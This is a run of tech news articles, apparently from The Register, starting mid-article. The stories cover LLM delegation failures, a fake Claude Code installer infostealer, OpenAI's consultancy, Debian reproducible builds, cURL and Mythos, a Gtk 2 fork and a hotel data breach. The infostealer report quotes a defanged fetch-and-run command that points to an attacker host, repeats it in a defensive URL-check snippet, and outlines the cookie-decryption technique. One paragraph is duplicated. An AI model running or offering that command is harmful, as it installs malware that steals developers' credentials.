Tools in this instance didn't help. "The four tested models perform worse when operated agentically with tools than without, incurring an average additional degradation of 6 percent by the end of simulation," the authors observe, in reference to GPT-5.4, 5.2, 5.1, and 4.1. Given that task delegation is the whole point of an AI agent – if you wanted to do it yourself, you wouldn't have tried to automate the task – this casts a bit of a shadow on the AI hype train. An intern who corrupted a quarter of a document over a long workflow would be shown the door. Yet companies are showing AI the money: according to Deloitte, organizations are spending an average of 36 percent of their digital budgets on AI automation. That might make sense if arming LLMs with the tools to function as full-blown agents meant less document degradation. But that's not the case. The authors found "using a basic agentic harness does not improve the performance of LLMs" with regard to the DELEGATE-52 test and that LLM performance after two interactions doesn't reflect how models perform after 20, which they argue underscores the need for long-horizon evaluation. "Current LLMs are ready for delegated workflows in some domains such as Python coding, but not in other less common domains," the authors conclude. "In general, users still need to closely monitor LLM systems as they operate and complete tasks on their behalf." Yet they also note that LLMs have been getting better, pointing to the performance of OpenAI's GPT model family, which has seen its benchmark performance increase over 16 months from 14.7 percent to 71.5 percent. ®
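To see what those cutoffs mean in practice, here's a toy reconstruction of the readiness classification described above – our own sketch, not the paper's scoring code. Scores represent the fraction of the original document preserved after each delegated interaction:

```python
# Toy rendering of the article's thresholds: "ready" needs >= 98 percent of
# content preserved after 20 interactions; 80 percent or less counts as
# "catastrophic corruption". Not the paper's actual code.
def classify(scores: list[float]) -> str:
    final = scores[-1]
    if final >= 0.98:
        return "ready"
    if final <= 0.80:
        return "catastrophic corruption"
    return "not ready"

# Hypothetical runs: per the paper, errors tend to land in one big drop
# rather than accumulating gradually
steady = [1.0 - 0.001 * i for i in range(1, 21)]  # slow decay to 98%
cliff  = [1.0] * 12 + [0.72] * 8                  # one round-trip loses 28 points
print(classify(steady))  # ready
print(classify(cliff))   # catastrophic corruption
```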
Cookie thieves caught stealing dev secrets via fake Claude Code installers
An ongoing campaign steals developers’ secrets via fake Claude Code installers and other popular coding tools, according to Ontinue’s security researchers. The lure - as with several other infostealer attacks targeting developers over the past several months - mimics a legitimate one-line installer, swapping in an attacker-controlled command. In this case, the legitimate command is “irm https[:]//claude[.]ai/install.ps1 | iex”, and the lure replaces the destination host, yielding “irm events[.]msft23[.]com | iex”. The payload is unique, and doesn’t match up with any documented malware family. It does, however, wreak havoc on developers, exfiltrating decrypted cookies, passwords, and payment methods from Chromium-based browsers such as Google Chrome, Microsoft Edge, Brave, Vivaldi, and Opera. According to the threat hunters who documented the new campaign on Monday: “We publish for peer correlation rather than attribution.” The attack also abuses the IElevator2 COM interface. This is Chromium’s elevation service used to handle App-Bound Encryption (ABE), specifically for encrypting and decrypting sensitive user data like cookies and passwords. Google introduced the new interface in January to protect Chromium-based browser data from cookie thieves, who used earlier ABE bypass techniques and commodity stealers that file-copied the SQLite databases holding cookies and saved passwords. However, crafty crooks (and security researchers) soon figured out workarounds to abuse IElevator2, as is the case with the newly spotted malware. The attack runs across three domains, all registered within six days of each other in April, and all fronted through Cloudflare. It relies on developers searching for “install claude code,” and selecting a sponsored result that leads to a lookalike Claude Code installation page. The page downloads and executes Anthropic’s authentic installer - but as Ontinue’s team found, the malicious instruction isn’t stored in the file itself, but instead rendered into the HTML of the landing page. “Automated scanners, URL reputation services, and any skeptical reviewer who simply curls the URL therefore observe clean PowerShell delivered from a Cloudflare-fronted domain bearing a valid Let’s Encrypt certificate,” the researchers wrote. “Victims, meanwhile, are presented with an entirely different command.” The pasted command redirects victims to an obfuscated PowerShell loader that injects a native ABE helper into a live browser process. The helper’s “exclusive purpose,” we’re told, is to invoke the browser's IElevator2 COM interface and recover the App-Bound Encryption key. The helper names its exfiltration pipe using Chromium’s legitimate Mojo naming convention for IPC pipes. It then attempts to use IElevator2 to decrypt developer secrets, but falls back to the legacy IElevator interface on the Elevation Service if the new one doesn’t work. Ontinue’s researchers published a full list of elevation-service identifiers, so be sure to check that out. And after receiving the ABE key from the helper, the PowerShell loader decrypts the local browser databases and sends the stolen data to an attacker-controlled server via an in-memory secure_prefs.zip archive.
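One practical takeaway from the lure described above: the download host, not the shape of the command, is the tell. A trivial defensive check – our own sketch, not Ontinue's tooling – might compare any pasted one-line installer against the vendor's known host:

```python
# Sketch of an allowlist check for one-line installers; the hosts come from
# the story, the code is our own illustration.
import re

OFFICIAL_HOSTS = {"claude.ai"}  # the legitimate installer host

def check_installer(cmd: str) -> str:
    m = re.search(r"irm\s+(?:https?://)?([^/\s|]+)", cmd, re.IGNORECASE)
    if not m:
        return "no installer URL found"
    host = m.group(1).lower()
    return "ok" if host in OFFICIAL_HOSTS else f"suspicious host: {host}"

print(check_installer("irm https://claude.ai/install.ps1 | iex"))  # ok
print(check_installer("irm events.msft23.com | iex"))  # suspicious host: events.msft23.com
```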
The malware hunters say that they compared the malware against published reporting for several stealers - including Lumma, StealC, Vidar, EddieStealer, Glove Stealer, Katz Stealer, Marco Stealer, Shuyal, AuraStealer, Torg Grabber, VoidStealer, Phemedrone, Metastealer, Xenostealer, ACRStealer, DumpBrowserSecrets, DeepLoad, and Storm - and found no technical match. The closest is Glove Stealer, first documented by Gen Digital in November 2024, which also abuses IElevator via a helper module communicating over a named pipe. The orchestration model, however, differs from Glove in that it uses a “small native helper acting as a single-purpose ABE oracle, with all detection-visible activity pushed into PowerShell.” According to the research team, this split matters for defenders because “behavioral rule sets that look at the native PE in isolation will see nothing actionable.” As they put it: “Detection has to land at the COM call and at the PowerShell layer.” ®
OpenAI can't have incompetent AI consultants ruining the market, so bought its own
OpenAI can’t have inexperienced consultants derailing the AI hype train, so it’s launching a consultancy of its own to help enterprises find the value in its models necessary to justify the spending – spending that translates into revenue Sam Altman's company desperately needs to cover its infrastructure costs. To support the endeavor, OpenAI has agreed to acquire UK-based AI consulting firm Tomoro. The terms of the acquisition weren’t disclosed. Tomoro will form the backbone of the OpenAI Deployment Company, which will operate as a standalone business unit tasked with helping enterprises find the value that they've been missing from the AI flag bearer's models. But don’t worry, McKinsey. OpenAI’s new Forward Deployed Engineers (FDEs) are only there to make sure you don’t sour enterprises on AI by dragging them down an expensive rabbit hole that fails to deliver value. The new company is backed by the usual assortment of AI-crazed venture capitalists and private equity firms, but several consultancies, including Capgemini, Bain, and yep, McKinsey, have agreed to plow billions into the venture. OpenAI says that its AI consultancy will launch with more than $4 billion of investments. Presumably, these consultancies will call in OpenAI’s FDEs when they need help proving AI can boost productivity and/or cut payroll. According to OpenAI, a typical enterprise engagement will look a bit like this: OpenAI’s FDEs will launch a diagnostic to determine where AI can create the most value, then carry out a select set of PoCs. If successful, the FDEs will then design, build, and deploy production systems that tie into enterprises' existing customer data and tools. The experience gained from these integrations will no doubt be used to improve OpenAI’s models and services. The acquisition of Tomoro would bring approximately 150 FDEs and deployment specialists into OpenAI’s new consultancy unit. The deal is expected to close in the coming months, subject to regulatory approvals. Whether enterprises should hitch their wagon to OpenAI’s success at a time when inference providers and model devs are already jacking up prices in an effort to get their infrastructure costs under control is another matter entirely. As we reported last week, with the launch of GPT-5.5, OpenAI once again increased its API pricing. For one million tokens, GPT-5.5 is priced at $5 (input), $0.50 (cached input), and $30 (output), double that of its predecessor. But don’t worry, OpenAI says the model might be more frugal about how it uses those tokens. ®
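For the curious, those list prices translate into per-call costs like so – the token counts below are hypothetical:

```python
# GPT-5.5 list prices quoted above, in dollars per million tokens
PRICES = {"input": 5.00, "cached_input": 0.50, "output": 30.00}

def call_cost(input_toks: int, cached_toks: int, output_toks: int) -> float:
    return (input_toks * PRICES["input"]
            + cached_toks * PRICES["cached_input"]
            + output_toks * PRICES["output"]) / 1_000_000

# e.g. a 20k-token prompt, half of it cache hits, yielding a 2k-token reply
print(f"${call_cost(10_000, 10_000, 2_000):.4f}")  # $0.1150
```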
Debian 14 cracks down on unreproducible packages
About halfway through the Debian 14 “Forky” development process, its release team announced a new goal: deterministic package compilation. The Debian project’s latest Bits from the release team newsletter includes a goal that may not sound very big, but it will mean significant extra effort in a direction that could prove to be a valuable extra security measure. "Aided by the efforts of the Reproducible Builds project, we’ve decided it’s time to say that Debian must ship reproducible packages," wrote Release Team member Paul Gevers. "Since yesterday, we have enabled our migration software to block migration of new packages that can’t be reproduced or existing packages (in testing) that regress in reproducibility." Of the two links in that paragraph, the independent Reproducible Builds project does not, in this vulture’s humble opinion, explain what it’s all about very clearly. We feel that Debian’s own Reproducible Builds wiki page does it better: It should be possible to reproduce, byte for byte, every build of every package in Debian. The Wikipedia article also has a good clear explanation, and introduces a helpful synonym: deterministic compilation. In other words, if you use the same version of the same compiler with the same options, then every time you compile an identical set of source files, the process ought to result in an identical set of binary files. This is starting to become an industry trend – for instance, when we reported on the release of FreeBSD 15 late last year, we noted that it too now promises reproducible builds. Reproducible builds in Debian have been a long time coming: The Register first reported on Debian’s efforts in this direction way back in 2015. It’s not an easy task, but it’s a useful security measure. The idea is to ensure that binaries have not been tampered with – for instance, modified to insert malware. It permits an additional verification step, so that users or automated tools can check whether the binaries they (or their OS package manager) downloaded are byte-identical to the ones they can compile themselves. Without this, you just have to trust the distributor who compiled your OS – as Ubuntu “self-appointed benevolent dictator for life” Mark Shuttleworth pointed out in 2012. (The Internet Archive has a copy of his long-gone blog post.) We also mentioned reproducible builds when we looked at NixOS Raccoon back in 2022, and tried to explain why it was a desirable thing. (Around the same time, Rocky Linux CEO Greg Kurtzer also told us that it was part of the plan for that project, too.) NixOS is already a little further down the reproducibility trail, and as we reported on its add-on Flox deployment tool in 2024, it also aims to deliver reproducible deployments. This won’t directly make Debian safer. It’s already one of the safer and more stable Linux distros around, anyway. Instead, it’s about infrastructure changes that make it easier to check the supply chain, and to make it possible to write software that can check and verify that what you’re getting really is what you thought you were getting. If it all works, you won’t be able to tell any difference – but auditing tools will. Debian 13 came out last August, and so Debian 14 is expected in about a year – although it does not have to stick to a rigorous fixed schedule like the commercially-backed projects. ®
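The verification step this enables is conceptually simple: rebuild the package yourself and compare checksums. A minimal sketch, with hypothetical file names:

```python
# Check whether a rebuilt package is byte-identical to the shipped binary.
# File names are made up for illustration.
import hashlib
from pathlib import Path

def sha256(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()

shipped = Path("hello_1.0-1_amd64.deb")    # package from the Debian mirror
rebuilt = Path("hello_rebuilt_amd64.deb")  # your own build from the same source

if sha256(shipped) == sha256(rebuilt):
    print("byte-for-byte identical: the build is reproducible")
else:
    print("mismatch: the shipped binary differs from your rebuild")
```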
Anthropic’s bug-hunting Mythos was greatest marketing stunt ever, says cURL creator
cURL developer Daniel Stenberg has seen Anthropic’s Mythos, a model the AI biz has suggested is too capable at finding security holes to release publicly, scan his popular open source project. But after the system turned up just a single vulnerability, he concluded the hype around Mythos was “primarily marketing” rather than a major AI security breakthrough. Stenberg explained in a Monday blog post that he was promised access to Anthropic’s Mythos model - sort of - through the AI biz’s Project Glasswing program. Part of Glasswing involves giving high-profile open source projects access via the Linux Foundation, but while Stenberg signed up to try Mythos, he said he never actually received direct access to the model. Instead, someone else with access ran Mythos against curl’s codebase and later sent him a report. “It’s not that I would have a lot of time to explore lots of different prompts and doing deep dive adventures anyway,” Stenberg explained. “Getting the tool to generate a first proper scan and analysis would be great, whoever did it.” That scan, which analyzed curl’s git repository at a recent master-branch commit, was sent back to him earlier this month, and it found just five things that it claimed were “confirmed security vulnerabilities” in cURL. Saying he had expected an extensive list of vulnerabilities, Stenberg wrote that the report “felt like nothing,” and that feeling was further validated by a review of Mythos’ findings. “Once my curl security team fellows and I had poked on this short list for a number of hours and dug into the details, we had trimmed the list down and were left with one confirmed vulnerability,” Stenberg said, bringing us back to the aforementioned number. As for the other four, three turned out to be false positives that pointed out cURL shortcomings already noted in API documentation, while the team deemed the fourth to be just a simple bug. “The single confirmed vulnerability is going to end up a severity low CVE planned to get published in sync with our pending next curl release 8.21.0 in late June,” the cURL meister noted. “The flaw is not going to make anyone grasp for breath.” That said, Mythos did find several other non-security bugs that Stenberg said the team is working on fixing, and he notes that their description and explanation were well done. Mythos can do good work, in other words, but it’s not a ground-breaking, game-changing AI model like Anthropic has claimed. “My personal conclusion can however not end up with anything else than that the big hype around this model so far was primarily marketing,” Stenberg said in the blog post. “I see no evidence that this setup finds issues to any particular higher or more advanced degree than the other tools have done before Mythos.”
cURL code is no stranger to AI
To say cURL has become widely used in its nearly three decades of existence would be an understatement. Its wide reach has meant that its team has been running it through all sorts of static code analyzers and fuzz testing it since well before the dawn of the AI age. With AI’s rise, the cURL team has adapted, meaning Mythos is hardly the first AI to get its fingers on cURL’s codebase. “These tools and the analyses they have done have triggered somewhere between two and three hundred bugfixes merged in curl through-out the recent 8-10 months or so,” Stenberg said of tools like AISLE, Zeropath, and OpenAI Codex Security that’ve tested cURL code.
With AI’s rise, the curl team has adapted, meaning Mythos is hardly the first AI to get its fingers on curl’s codebase. “These tools and the analyses they have done have triggered somewhere between two and three hundred bugfixes merged in curl through-out the recent 8-10 months or so,” Stenberg said of tools like AISLE, Zeropath, and OpenAI Codex Security that’ve tested curl code. “A bunch of the findings these AI tools reported were confirmed vulnerabilities and have been published as CVEs. Probably a dozen or more.”
That track record, in other words, makes curl a great candidate for gauging whether Mythos really finds more than the average AI does.
As Stenberg noted elsewhere in his blog post, Mythos isn’t doing anything particularly novel when it comes to security discoveries. It might be a bit better at finding things than previous models, but “it is not better to a degree that seems to make a significant dent in code analyzing,” the curl author wrote.
Stenberg isn’t a pessimist about AI’s ability to improve software design, though. Yes, he closed the curl bug bounty earlier this year due to an influx of sloppy, useless bug reports, but a few months before that closure he also noted that some security researchers assisted by AI had made valuable reports.
“AI powered code analyzers are significantly better at finding security flaws and mistakes in source code than any traditional code analyzers did in the past,” Stenberg said, adding an important qualifier for the Mythos moment: “All modern AI models are good at this now.”
Mythos isn’t any more creative than its creators
Both older AI models and security-focused tools like Mythos share a common limitation, as far as Stenberg is concerned: they’re only as good at finding security vulnerabilities as the humans who built them.
“AI tools find the usual and established kind of errors we already know about. It just finds new instances of them,” Stenberg said. “We have not seen any AI so far report a vulnerability that would somehow be of a novel kind or something totally new.”
As for Mythos, Stenberg remains unimpressed, calling it “an amazingly successful marketing stunt for sure” in his blog post.
In an email to The Register, Stenberg conceded it’s possible that AI models could one day discover genuinely novel classes of vulnerability, but he’s not convinced they can go beyond what humans are capable of finding, given that they’re limited by our understanding of how software vulnerabilities work. At the end of the day, he explained, when we talk about security, we’re only talking about code. “Source code is text and it feels like maybe we already know about most ways we can do security problems in it,” he pondered in his email.
In other words, like the valuable AI-assisted reports made to the curl bug bounty before a flood of AI garbage forced its closure, making valuable use of systems like Mythos is going to require humans to get creative. Sorry, no foisting your critical thinking onto a bot.
“Human researchers have always used tools when they look for security problems,” Stenberg told us. “Adding AIs to the mix gives the humans even more powerful tools to use, more ways to find problems. I expect that many security bugs going forward will be found by humans coming up with new ways and angles of prompting the AIs.”
Stenberg said he hopes to get his hands on Mythos eventually so he can experiment with its capabilities, but he doesn’t seem to be holding his breath for the promised access to materialize. “I have been promised access and for all I know I will eventually get it,” Stenberg told us. “I just don't know when.” ®
Gtk2-NG, next generation of Gtk 2, comes back to life
An effort to revive and reinvigorate the 2002-vintage Gtk 2 GUI programming toolkit is growing and gaining interest… as we predicted would happen a few months ago.
The gtk2-ng project is reviving and modernizing GTK+ version 2, which the GNOME developers declared dead back in 2020. We held off on reporting this for a while to see if the idea would gain some support, and it does seem to be winning interest and followers. Reviving a 24-year-old toolkit that reached its official end-of-life six years ago is a retrospective sort of undertaking, and as such, it appeals to some modern-but-nostalgic development projects.
Development is hosted on the Git instance of the Devuan project, the systemd-free fork of Debian. (Last year, Devuan announced its support of Xlibre, the X.org fork that aims to re-invigorate X11 development.) However, developer Daemonratte announced the fork in a thread on the forums of the Pale Moon browser: GTK2 revival. Pale Moon, as we described in 2021, is a continuing fork of an early version of Firefox.
Back in February, when we covered the news that Debian 14 planned to drop Gtk 2, we mentioned that this might provide the impetus for a fork. This isn’t the first such fork: we noted then that the Ardour digital audio workstation, which we last looked at in 2022, maintains its own internal version called YTK. Daemonratte says that they’ve already incorporated some fixes from that, and also from an earlier fork by stefan11111 which has been inactive for a couple of years.
They then outline where things stand and where they are headed.
Current status:
- Making it Y2K38-safe
- Getting rid of all deprecation warnings
- Patching it for NetBSD and backporting NetBSD-specific patches
- Testing it on all kinds of hardware
- Further modernization without breaking ABI
Future plans:
- Implement touch support and smooth scrolling from Ardour’s ytk without breaking ABI, so Ardour can be compiled against gtk2 again
- Heavily lobby for its adoption in the BSD and systemdfree Linux world
- Reimplement GtkMozEmbed for UXP, so this wonderful engine can be used in gtk2 projects
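That first status item, Y2K38 safety, refers to the classic 32-bit time_t rollover: a signed 32-bit Unix timestamp runs out of seconds at 03:14:07 UTC on 19 January 2038, after which it wraps back to December 1901. Here is a minimal sketch of the general problem - our own illustration, nothing to do with gtk2-ng’s actual code:

    /* The Y2K38 problem in miniature - our sketch, not gtk2-ng code.
     * A signed 32-bit time_t cannot count past 03:14:07 UTC on
     * 19 January 2038; one tick later it wraps to December 1901. */
    #include <stdio.h>
    #include <stdint.h>
    #include <time.h>

    int main(void) {
        /* The largest second a signed 32-bit time_t can represent. */
        time_t last = (time_t)INT32_MAX;
        printf("last 32-bit second: %s", ctime(&last));

        /* Fine on a 64-bit time_t; a 32-bit time_t would instead have
         * wrapped to a negative value, i.e. 13 December 1901. */
        time_t after = (time_t)INT32_MAX + 1;
        printf("one second later:   %s", ctime(&after));

        /* gtk2-ng's stated goal is for the toolkit to behave either way. */
        printf("time_t here is %zu bytes\n", sizeof(time_t));
        return 0;
    }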
Gtk originally stood for GIMP Tool Kit: 30 years ago, when the GIMP image editor made its public début, Gtk was the set of tools GIMP’s authors created to make it easier to write GUI apps in C. Six years later, GTK+ 2.0.0 appeared. (The plus sign had joined the name earlier, when the toolkit was reworked around an object-oriented design.) When Miguel de Icaza announced the GNOME desktop project in 1997, it adopted Gtk instead of the then-semi-commercial Qt that KDE used. Since then, Gtk has been developed alongside GNOME.
GIMP development is relatively slow: the team finally released version 3.0 a year ago, and it uses Gtk 3. (Last month, it released version 3.2.4.) Since launch, though, the GNOME project has released 39 numbered versions, and in recent decades Gtk has kept pace with GNOME, not GIMP. The last minor version of Gtk 2 was GTK+ 2.24, which appeared in 2011, and the GNOME developers officially declared the toolkit end-of-life with the release of Gtk 4 in 2020.
Gtk2-ng is far from the only project to fork and revive an older version of a codebase that has since been superseded by newer releases from the original team. One of the obvious ones is the MATE desktop, which Argentinian developer Perberos announced in 2011. Even so, Daemonratte stated: "The ultimate vision of this fork is to keep gtk2 alive for software using it right now and to revive gtk2 versions of […] Gnome2 […]. Yes, I don’t have to do this alone and no, Mate is not an option, because they use gtk3 now."
It is very much not alone. We have been covering releases of the KDE 3 fork, the Trinity desktop environment, since version 14.0.11 in 2021. This vulture used KDE 1.x back when it was the state of the Linux art, and for us, KDE 3.x was already too big and complicated. For the KDE project’s 20th anniversary in 2016, Brazilian developer Helio Chissini de Castro modernized KDE 1 so that it would build and run on Fedora 25. We didn’t realize this had become an ongoing effort, but it has.
From later in the gtk2-ng thread, we learned about MiDesktop, a continuing project based on Osiris, a modernized Qt 2. ®
BWH Hotels guests warned after reservation data checks out with cybercrooks
BWH Hotels is informing customers about a third-party data breach that gave cybercriminals access to six months' worth of data.
The notification email stated that BWH Hotels, which owns the WorldHotels, Best Western Hotels & Resorts, and Sure Hotels brands, identified the intrusion on April 22, but the affected data goes back to October 14, 2025.
BWH Hotels CTO Bill Ryan, who penned the notification email, said names, email addresses, telephone numbers, and/or home addresses belonging to "certain guests" were accessed by an unauthorized third party. The intruders also accessed reservation details, such as reservation numbers, dates of stay, and any special requests. The company confirmed that the attack targeted one of its "web applications that houses certain guest reservation data." No payment or bank details were involved.
The Register asked BWH Hotels whether the intrusion began in October and went undetected until April, or whether a later breach exposed data dating back to October. We also asked whether this was related to information we were sent in March about BWH Hotels customer booking data being stolen and used for phishing campaigns. At the time, the company neither confirmed nor denied the information seen by The Register. BWH Hotels did not immediately respond to our request for comment on Monday.
"Upon discovering the incident, we immediately took the application offline and revoked the unauthorized access," said Ryan. "We have engaged leading external cybersecurity experts to support our incident response efforts and to assist with the further strengthening of existing safeguards."
"We advise guests to be extra vigilant when viewing any unexpected or suspicious communications about hotel stays. If you receive a suspicious communication such as an unexpected email, text, WhatsApp message, or telephone call that asks for payment, codes, logins, or 'verification,' even if they reference a BWH Hotels property or an upcoming reservation, do not engage. Navigate to sites directly rather than clicking links." ®
